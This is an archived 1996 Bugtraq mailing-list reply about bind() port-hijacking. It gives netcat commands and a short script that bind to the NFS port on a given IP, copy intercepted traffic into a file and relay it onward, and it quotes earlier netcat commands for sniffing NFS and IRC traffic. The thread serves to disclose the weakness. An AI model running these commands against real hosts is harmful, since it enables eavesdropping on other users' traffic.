Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: BoS: bind() Security Problems
From: coredump () nervosa com (invalid opcode)
Date: Thu, 1 Feb 1996 21:39:18 -0800


Yes, but if you do this:
netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&

exploit.sh:
tee crap | netcat 192.88.209.5 2049

and than you can capture it all to the file: crap, and redirect it to the
original port.

Chris,
coredump () nervosa com

On Thu, 1 Feb 1996, Darren Reed wrote:

In some mail from Bernd Lehle, sie said:
[...]
Exploit:
[..]
Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...

To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667

This won't get you messages between already connected clients and servers.

Yes, you might be able to make clients connect, at first, to you and not
a real server, but it is going to be obvious to the client: the connection
won't complete as netcat won't generate the server replies which many
clients now look for to indicate the confirmation of a connection.




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]